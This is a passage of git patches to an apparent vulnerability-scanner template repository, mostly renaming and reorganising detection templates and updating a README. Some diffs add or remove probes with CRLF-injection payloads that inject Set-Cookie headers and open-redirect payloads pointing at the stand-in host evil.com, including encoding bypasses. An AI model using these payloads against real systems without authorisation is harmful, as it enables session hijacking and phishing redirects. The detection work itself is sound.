rename to exposed-tokens/mailchimp/mailchimp-api-key.yaml
diff --git a/exposed-tokens/tokens/slack-access-token.yaml b/exposed-tokens/slack/slack-access-token.yaml
similarity index 100%
rename from exposed-tokens/tokens/slack-access-token.yaml
rename to exposed-tokens/slack/slack-access-token.yaml
diff --git a/exposed-files/apc-info.yaml b/misconfiguration/apc-info.yaml
similarity index 100%
rename from exposed-files/apc-info.yaml
rename to misconfiguration/apc-info.yaml
diff --git a/misconfiguration/generic-detections/basic-xss-prober.yaml b/misconfiguration/basic-xss-prober.yaml
similarity index 100%
rename from misconfiguration/generic-detections/basic-xss-prober.yaml
rename to misconfiguration/basic-xss-prober.yaml
diff --git a/exposed-files/cgi-test-page.yaml b/misconfiguration/cgi-test-page.yaml
similarity index 100%
rename from exposed-files/cgi-test-page.yaml
rename to misconfiguration/cgi-test-page.yaml
diff --git a/exposed-panels/docker-api.yaml b/misconfiguration/docker-api.yaml
similarity index 100%
rename from exposed-panels/docker-api.yaml
rename to misconfiguration/docker-api.yaml
diff --git a/exposed-files/druid-monitor.yaml b/misconfiguration/druid-monitor.yaml
similarity index 100%
rename from exposed-files/druid-monitor.yaml
rename to misconfiguration/druid-monitor.yaml
diff --git a/exposed-files/elasticsearch.yaml b/misconfiguration/elasticsearch.yaml
similarity index 100%
rename from exposed-files/elasticsearch.yaml
rename to misconfiguration/elasticsearch.yaml
diff --git a/exposed-files/exposed-kibana.yaml b/misconfiguration/exposed-kibana.yaml
similarity index 100%
rename from exposed-files/exposed-kibana.yaml
rename to misconfiguration/exposed-kibana.yaml
diff --git a/exposed-files/jkstatus-manager.yaml b/misconfiguration/jkstatus-manager.yaml
similarity index 100%
rename from exposed-files/jkstatus-manager.yaml
rename to misconfiguration/jkstatus-manager.yaml
diff --git a/exposed-panels/kubernetes-pods.yaml b/misconfiguration/kubernetes-pods.yaml
similarity index 100%
rename from exposed-panels/kubernetes-pods.yaml
rename to misconfiguration/kubernetes-pods.yaml
diff --git a/technologies/linkerd-ssrf-detect.yaml b/misconfiguration/linkerd-ssrf-detect.yaml
similarity index 100%
rename from technologies/linkerd-ssrf-detect.yaml
rename to misconfiguration/linkerd-ssrf-detect.yaml
diff --git a/exposed-files/php-errors.yaml b/misconfiguration/php-errors.yaml
similarity index 100%
rename from exposed-files/php-errors.yaml
rename to misconfiguration/php-errors.yaml
diff --git a/exposed-files/shell-history.yaml b/misconfiguration/shell-history.yaml
similarity index 100%
rename from exposed-files/shell-history.yaml
rename to misconfiguration/shell-history.yaml
diff --git a/exposed-files/tomcat-scripts.yaml b/misconfiguration/tomcat-scripts.yaml
similarity index 100%
rename from exposed-files/tomcat-scripts.yaml
rename to misconfiguration/tomcat-scripts.yaml
diff --git a/exposed-files/firebase-detect.yaml b/technologies/firebase-detect.yaml
similarity index 100%
rename from exposed-files/firebase-detect.yaml
rename to technologies/firebase-detect.yaml
diff --git a/exposed-files/jolokia.yaml b/technologies/jolokia.yaml
similarity index 100%
rename from exposed-files/jolokia.yaml
rename to technologies/jolokia.yaml
diff --git a/vulnerabilities/crlf-injection.yaml b/vulnerabilities/crlf-injection.yaml
index 49d001e8a9..f91bfe6ba2 100644
--- a/vulnerabilities/crlf-injection.yaml
+++ b/vulnerabilities/crlf-injection.yaml
@@ -1,25 +1,27 @@
-id: crlf-injection
-
-info:
-  name: CRLF injection
-  author: melbadry9 & nadino & xElkomy
-  severity: low
-  description: Improper sanitization of CRLF sequences.
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
-      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection"  # unicode bypass
-      - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection"
-      - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
-      - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
-      - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.."  # Apache
-      - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"  # CVE-2016-4975
-      - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"
-
-    matchers:
-      - type: regex
-        regex:
-          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'
-        part: header
+id: open-redirect
+
+info:
+  name: Open redirect Detection
+  author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & geeknik
+  severity: low
+  description: A user-controlled input redirect users to an external website.
+
+requests:
+  - method: GET
+
+    path:
+      - "{{BaseURL}}/evil.com/"
+      - "{{BaseURL}}/evil.com//"
+      - "{{BaseURL}}///;@evil.com"
+      - "{{BaseURL}}///evil.com/%2F.."
+      - "{{BaseURL}}/////evil.com"
+      - "{{BaseURL}}//evil.com/%2F.."
+      - "{{BaseURL}}//evil.com/..;/css"
+      - "{{BaseURL}}/evil%E3%80%82com"
+      - "{{BaseURL}}/%5Cevil.com"
+      - "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&langTo=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri=evil.com&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com"
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
+        part: header
diff --git a/misconfiguration/generic-detections/top-15-xss.yaml b/vulnerabilities/generic/top-15-xss.yaml
similarity index 100%
rename from misconfiguration/generic-detections/top-15-xss.yaml
rename to vulnerabilities/generic/top-15-xss.yaml
diff --git a/exposed-panels/jenkins-asyncpeople.yaml b/vulnerabilities/jenkins/jenkins-asyncpeople.yaml
similarity index 100%
rename from exposed-panels/jenkins-asyncpeople.yaml
rename to vulnerabilities/jenkins/jenkins-asyncpeople.yaml
diff --git a/misconfiguration/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml
similarity index 100%
rename from misconfiguration/jenkins-stack-trace.yaml
rename to vulnerabilities/jenkins/jenkins-stack-trace.yaml
diff --git a/misconfiguration/unauthenticated-jenkin-dashboard.yaml b/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml
similarity index 100%
rename from misconfiguration/unauthenticated-jenkin-dashboard.yaml
rename to vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml
diff --git a/misconfiguration/jira-service-desk-signup.yaml b/vulnerabilities/jira/jira-service-desk-signup.yaml
similarity index 100%
rename from misconfiguration/jira-service-desk-signup.yaml
rename to vulnerabilities/jira/jira-service-desk-signup.yaml
diff --git a/misconfiguration/jira-unauthenticated-dashboards.yaml b/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
similarity index 100%
rename from misconfiguration/jira-unauthenticated-dashboards.yaml
rename to vulnerabilities/jira/jira-unauthenticated-dashboards.yaml
diff --git a/misconfiguration/jira-unauthenticated-popular-filters.yaml b/vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml
similarity index 100%
rename from misconfiguration/jira-unauthenticated-popular-filters.yaml
rename to vulnerabilities/jira/jira-unauthenticated-popular-filters.yaml
diff --git a/misconfiguration/jira-unauthenticated-projects.yaml b/vulnerabilities/jira/jira-unauthenticated-projects.yaml
similarity index 100%
rename from misconfiguration/jira-unauthenticated-projects.yaml
rename to vulnerabilities/jira/jira-unauthenticated-projects.yaml
diff --git a/misconfiguration/jira-unauthenticated-user-picker.yaml b/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
similarity index 100%
rename from misconfiguration/jira-unauthenticated-user-picker.yaml
rename to vulnerabilities/jira/jira-unauthenticated-user-picker.yaml
diff --git a/vulnerabilities/moodle-filter-jmol-lfi.yaml b/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
similarity index 100%
rename from vulnerabilities/moodle-filter-jmol-lfi.yaml
rename to vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml
diff --git a/vulnerabilities/moodle-filter-jmol-xss.yaml b/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
similarity index 100%
rename from vulnerabilities/moodle-filter-jmol-xss.yaml
rename to vulnerabilities/moodle/moodle-filter-jmol-xss.yaml
diff --git a/vulnerabilities/open-redirect.yaml b/vulnerabilities/open-redirect.yaml
deleted file mode 100644
index f91bfe6ba2..0000000000
--- a/vulnerabilities/open-redirect.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: open-redirect
-
-info:
-  name: Open redirect Detection
-  author: melbadry9 & Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1 & geeknik
-  severity: low
-  description: A user-controlled input redirect users to an external website.
-
-requests:
-  - method: GET
-
-    path:
-      - "{{BaseURL}}/evil.com/"
-      - "{{BaseURL}}/evil.com//"
-      - "{{BaseURL}}///;@evil.com"
-      - "{{BaseURL}}///evil.com/%2F.."
-      - "{{BaseURL}}/////evil.com"
-      - "{{BaseURL}}//evil.com/%2F.."
-      - "{{BaseURL}}//evil.com/..;/css"
-      - "{{BaseURL}}/evil%E3%80%82com"
-      - "{{BaseURL}}/%5Cevil.com"
-      - "{{BaseURL}}/?Page=evil.com&_url=evil.com&callback=evil.com&checkout_url=evil.com&content=evil.com&continue=evil.com&continueTo=evil.com&counturl=evil.com&data=evil.com&dest=evil.com&dest_url=evil.com&dir=evil.com&document=evil.com&domain=evil.com&done=evil.com&download=evil.com&feed=evil.com&file=evil.com&host=evil.com&html=evil.com&http=evil.com&https=evil.com&image=evil.com&image_src=evil.com&image_url=evil.com&imageurl=evil.com&include=evil.com&langTo=evil.com&media=evil.com&navigation=evil.com&next=evil.com&open=evil.com&out=evil.com&page=evil.com&page_url=evil.com&pageurl=evil.com&path=evil.com&picture=evil.com&port=evil.com&proxy=evil.com&redir=evil.com&redirect=evil.com&redirectUri=evil.com&redirectUrl=evil.com&reference=evil.com&referrer=evil.com&req=evil.com&request=evil.com&retUrl=evil.com&return=evil.com&returnTo=evil.com&return_path=evil.com&return_to=evil.com&rurl=evil.com&show=evil.com&site=evil.com&source=evil.com&src=evil.com&target=evil.com&to=evil.com&uri=evil.com&url=evil.com&val=evil.com&validate=evil.com&view=evil.com&window=evil.com&redirect_to=evil.com"
-    matchers:
-      - type: regex
-        regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
-        part: header
diff --git a/vulnerabilities/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
similarity index 100%
rename from vulnerabilities/oracle-ebs-bispgraph-file-access.yaml
rename to vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
diff --git a/vulnerabilities/rails6-xss.yaml b/vulnerabilities/rails/rails6-xss.yaml
similarity index 100%
rename from vulnerabilities/rails6-xss.yaml
rename to vulnerabilities/rails/rails6-xss.yaml
diff --git a/vulnerabilities/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
similarity index 100%
rename from vulnerabilities/springboot-actuators-jolokia-xxe.yaml
rename to vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
diff --git a/vulnerabilities/springboot-h2-db-rce.yaml b/vulnerabilities/springboot/springboot-h2-db-rce.yaml
similarity index 100%
rename from vulnerabilities/springboot-h2-db-rce.yaml
rename to vulnerabilities/springboot/springboot-h2-db-rce.yaml
diff --git a/vulnerabilities/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml
similarity index 100%
rename from vulnerabilities/vmware-vcenter-lfi-linux.yaml
rename to vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml
diff --git a/vulnerabilities/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
similarity index 100%
rename from vulnerabilities/vmware-vcenter-lfi.yaml
rename to vulnerabilities/vmware/vmware-vcenter-lfi.yaml
diff --git a/vulnerabilities/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
similarity index 100%
rename from vulnerabilities/easy-wp-smtp-listing.yaml
rename to vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
diff --git a/vulnerabilities/w3c-total-cache-ssrf.yaml b/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
similarity index 100%
rename from vulnerabilities/w3c-total-cache-ssrf.yaml
rename to vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml
diff --git a/misconfiguration/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
similarity index 100%
rename from misconfiguration/wordpress-accessible-wpconfig.yaml
rename to vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
diff --git a/exposed-files/wordpress-db-backup.yaml b/vulnerabilities/wordpress/wordpress-db-backup.yaml
similarity index 100%
rename from exposed-files/wordpress-db-backup.yaml
rename to vulnerabilities/wordpress/wordpress-db-backup.yaml
diff --git a/exposed-files/wordpress-debug-log.yaml b/vulnerabilities/wordpress/wordpress-debug-log.yaml
similarity index 100%
rename from exposed-files/wordpress-debug-log.yaml
rename to vulnerabilities/wordpress/wordpress-debug-log.yaml
diff --git a/exposed-files/wordpress-directory-listing.yaml b/vulnerabilities/wordpress/wordpress-directory-listing.yaml
similarity index 100%
rename from exposed-files/wordpress-directory-listing.yaml
rename to vulnerabilities/wordpress/wordpress-directory-listing.yaml
diff --git a/vulnerabilities/wordpress-emails-verification-for-woocommerce.yaml b/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
similarity index 100%
rename from vulnerabilities/wordpress-emails-verification-for-woocommerce.yaml
rename to vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
diff --git a/exposed-files/wordpress-emergency-script.yaml b/vulnerabilities/wordpress/wordpress-emergency-script.yaml
similarity index 100%
rename from exposed-files/wordpress-emergency-script.yaml
rename to vulnerabilities/wordpress/wordpress-emergency-script.yaml
diff --git a/exposed-files/wordpress-installer-log.yaml b/vulnerabilities/wordpress/wordpress-installer-log.yaml
similarity index 100%
rename from exposed-files/wordpress-installer-log.yaml
rename to vulnerabilities/wordpress/wordpress-installer-log.yaml
diff --git a/vulnerabilities/wordpress-social-metrics-tracker.yaml b/vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
similarity index 100%
rename from vulnerabilities/wordpress-social-metrics-tracker.yaml
rename to vulnerabilities/wordpress/wordpress-social-metrics-tracker.yaml
diff --git a/exposed-files/wordpress-tmm-db-migrate.yaml b/vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml
similarity index 100%
rename from exposed-files/wordpress-tmm-db-migrate.yaml
rename to vulnerabilities/wordpress/wordpress-tmm-db-migrate.yaml
diff --git a/exposed-files/wordpress-user-enumeration.yaml b/vulnerabilities/wordpress/wordpress-user-enumeration.yaml
similarity index 100%
rename from exposed-files/wordpress-user-enumeration.yaml
rename to vulnerabilities/wordpress/wordpress-user-enumeration.yaml
diff --git a/vulnerabilities/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
similarity index 100%
rename from vulnerabilities/wordpress-wordfence-xss.yaml
rename to vulnerabilities/wordpress/wordpress-wordfence-xss.yaml
diff --git a/vulnerabilities/wordpress-wpcourses-info-disclosure.yaml b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
similarity index 100%
rename from vulnerabilities/wordpress-wpcourses-info-disclosure.yaml
rename to vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml

From 81c04d4e07327f8af4edb933971f03f87ca03b22 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <dwi.siswanto98@gmail.com>
Date: Sat, 9 Jan 2021 05:27:55 +0700
Subject: [PATCH 21/85] :hammer: Add Exposed Spring Data REST ALPS

---
 files/exposed-alps-spring.yaml | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 files/exposed-alps-spring.yaml

diff --git a/files/exposed-alps-spring.yaml b/files/exposed-alps-spring.yaml
new file mode 100644
index 0000000000..b187fa0a2e
--- /dev/null
+++ b/files/exposed-alps-spring.yaml
@@ -0,0 +1,34 @@
+id: exposed-alps-spring
+
+info:
+  name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS)
+  author: dwisiswant0
+  severity: medium
+
+  # https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/profile"
+      - "{{BaseURL}}/api/profile"
+      - "{{BaseURL}}/alps/profile"
+      - "{{BaseURL}}:8080/profile"
+      - "{{BaseURL}}:8080/api/profile"
+      - "{{BaseURL}}:8080/alps/profile"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "_links"
+          - "/alps/"
+          - "profile"
+        condition: and
+        part: body
+      - type: word
+        words:
+          - "application/hal+json"
+        part: header
+      - type: status
+        status:
+          - 200
\ No newline at end of file

From 0cf38debaf69280fb5f5b256c9b80caba2cfdba1 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sat, 9 Jan 2021 17:10:12 +0530
Subject: [PATCH 22/85] Update exposed-alps-spring.yaml

---
 files/exposed-alps-spring.yaml | 6 +-----
 1 file changed, 1 insertion(+), 5 deletions(-)

diff --git a/files/exposed-alps-spring.yaml b/files/exposed-alps-spring.yaml
index b187fa0a2e..dea715883a 100644
--- a/files/exposed-alps-spring.yaml
+++ b/files/exposed-alps-spring.yaml
@@ -4,8 +4,7 @@ info:
   name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS)
   author: dwisiswant0
   severity: medium
-
-  # https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/
+  reference: https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/
 
 requests:
   - method: GET
@@ -13,9 +12,6 @@ requests:
       - "{{BaseURL}}/profile"
       - "{{BaseURL}}/api/profile"
       - "{{BaseURL}}/alps/profile"
-      - "{{BaseURL}}:8080/profile"
-      - "{{BaseURL}}:8080/api/profile"
-      - "{{BaseURL}}:8080/alps/profile"
     matchers-condition: and
     matchers:
       - type: word

From 51de12683b16676bd89c12c6e869090f532862c2 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Sat, 9 Jan 2021 11:41:27 +0000
Subject: [PATCH 23/85] Auto Update README [Sat Jan  9 11:41:27 UTC 2021]
 :robot:

---
 README.md | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 6bc48cbd79..5e467fbb7d 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ An overview of the nuclei template directory including number of templates and H
 
 | Templates          | Counts                           | Templates                 | Counts                                  |
 | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 147             | files                     | 50                     |
+| cves               | 147             | files                     | 51                     |
 | vulnerabilities    | 42    | panels                    | 50                    |
 | technologies       | 41       | security-misconfiguration | 29 |
 | workflows          | 17          | tokens                    | 8                    |
@@ -213,6 +213,7 @@ An overview of the nuclei template directory including number of templates and H
 │   ├── elasticsearch.yaml
 │   ├── elmah-log-file.yaml
 │   ├── error-logs.yaml
+│   ├── exposed-alps-spring.yaml
 │   ├── exposed-kibana.yaml
 │   ├── exposed-svn.yaml
 │   ├── filezilla.yaml
@@ -483,7 +484,7 @@ An overview of the nuclei template directory including number of templates and H
 
 </details>
 
-**24 directories, 424 files**.
+**24 directories, 425 files**.
 
 Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
 

From 187e4a5feb8f46197fdeace0db67d5780f857e32 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sat, 9 Jan 2021 18:32:04 +0530
Subject: [PATCH 24/85] moving more files around

---
 .../tomcat-manager-pathnormalization.yaml     |  0
 .../apis/swagger-api.yaml                     |  2 +-
 .../apis/wadl-api.yaml                        |  2 +-
 .../apis/wsdl-api.yaml                        |  2 +-
 .../backups/sql-dump.yaml                     |  0
 .../backups/zip-backup-files.yaml             |  0
 .../configs/composer-config.yaml              |  0
 .../configs/exposed-svn.yaml                  |  0
 .../configs/git-config-nginxoffbyslash.yaml   |  0
 .../configs/git-config.yaml                   |  0
 .../configs}/htpasswd-detection.yaml          |  0
 .../configs/laravel-env.yaml                  |  0
 .../configs/magento-config.yaml               |  0
 .../configs/owncloud-config.yaml              |  0
 .../configs/package-json.yaml                 |  0
 .../configs/phpinfo.yaml                      |  0
 .../configs/redmine-db-config.yaml            |  0
 .../configs}/server-status-localhost.yaml     |  0
 .../configs}/syfmony-profiler.yaml            |  0
 .../configs/web-config.yaml                   |  0
 .../files}/domcfg-page.yaml                   |  0
 .../files}/drupal-install.yaml                |  0
 .../files}/ds_store.yaml                      |  0
 .../files}/filezilla.yaml                     |  0
 .../files}/lazy-file.yaml                     |  0
 .../files}/server-private-keys.yaml           |  0
 .../files}/xprober-service.yaml               |  0
 .../logs/elmah-log-file.yaml                  |  0
 .../logs/error-logs.yaml                      |  0
 .../logs}/trace-axd-detect.yaml               |  0
 .../aws-redirect.yaml                         |  8 +++---
 .../docker-registry.yaml                      |  0
 misconfiguration/larvel-debug.yaml            |  2 --
 .../symfony-debugmode.yaml                    |  0
 ...takeovers.yaml => subdomain-takeover.yaml} |  0
 .../graylog-api-browser.yaml                  |  0
 .../telerik-dialoghandler-detect.yaml         |  0
 .../telerik-fileupload-detect.yaml            |  0
 vulnerabilities/generic/crlf-injection.yaml   | 25 +++++++++++++++++++
 .../{top-15-xss.yaml => top-xss-params.yaml}  |  2 +-
 .../url-redirect.yaml}                        |  0
 .../{ => ibm}/eclipse-help-system-xss.yaml    |  0
 .../ibm-infoprint-directory-traversal.yaml    |  0
 ...k-momentum-series-directory-traversal.yaml |  0
 .../{ => other}/cached-aem-pages.yaml         |  0
 .../{ => other}/couchdb-adminparty.yaml       |  0
 .../{ => other}/discourse-xss.yaml            |  0
 .../{ => other}/mcafee-epo-rce.yaml           |  0
 .../{ => other}/microstrategy-ssrf.yaml       |  0
 .../{ => other}/mida-eframework-xss.yaml      |  0
 .../{ => other}/nginx-module-vts-xss.yaml     |  0
 .../{ => other}/nuuo-nvrmini2-rce.yaml        |  0
 .../{ => other}/pdf-signer-ssti-to-rce.yaml   |  0
 .../rce-shellshock-user-agent.yaml            |  0
 .../rce-via-java-deserialization.yaml         |  0
 vulnerabilities/{ => other}/rconfig-rce.yaml  |  0
 .../{ => other}/sick-beard-xss.yaml           |  0
 .../symantec-messaging-gateway.yaml           |  0
 .../{ => other}/tikiwiki-reflected-xss.yaml   |  0
 .../{ => other}/twig-php-ssti.yaml            |  0
 .../{ => other}/vpms-auth-bypass.yaml         |  0
 .../{ => other}/wems-manager-xss.yaml         |  0
 .../{ => other}/zms-auth-bypass.yaml          |  0
 .../{ => wordpress}/sassy-social-share.yaml   |  0
 64 files changed, 32 insertions(+), 11 deletions(-)
 rename {vulnerabilities => exposed-panels}/tomcat-manager-pathnormalization.yaml (100%)
 rename exposed-files/apis/swagger-panel.yaml => exposures/apis/swagger-api.yaml (98%)
 rename exposed-files/apis/wadl-files.yaml => exposures/apis/wadl-api.yaml (98%)
 rename exposed-files/apis/wsdl-detect.yaml => exposures/apis/wsdl-api.yaml (89%)
 rename {exposed-files => exposures}/backups/sql-dump.yaml (100%)
 rename {exposed-files => exposures}/backups/zip-backup-files.yaml (100%)
 rename {exposed-files => exposures}/configs/composer-config.yaml (100%)
 rename {exposed-files => exposures}/configs/exposed-svn.yaml (100%)
 rename {exposed-files => exposures}/configs/git-config-nginxoffbyslash.yaml (100%)
 rename {exposed-files => exposures}/configs/git-config.yaml (100%)
 rename {exposed-files => exposures/configs}/htpasswd-detection.yaml (100%)
 rename {exposed-files => exposures}/configs/laravel-env.yaml (100%)
 rename {exposed-files => exposures}/configs/magento-config.yaml (100%)
 rename {exposed-files => exposures}/configs/owncloud-config.yaml (100%)
 rename {exposed-files => exposures}/configs/package-json.yaml (100%)
 rename {exposed-files => exposures}/configs/phpinfo.yaml (100%)
 rename {exposed-files => exposures}/configs/redmine-db-config.yaml (100%)
 rename {exposed-files => exposures/configs}/server-status-localhost.yaml (100%)
 rename {exposed-files => exposures/configs}/syfmony-profiler.yaml (100%)
 rename {exposed-files => exposures}/configs/web-config.yaml (100%)
 rename {exposed-files => exposures/files}/domcfg-page.yaml (100%)
 rename {exposed-files => exposures/files}/drupal-install.yaml (100%)
 rename {exposed-files => exposures/files}/ds_store.yaml (100%)
 rename {exposed-files => exposures/files}/filezilla.yaml (100%)
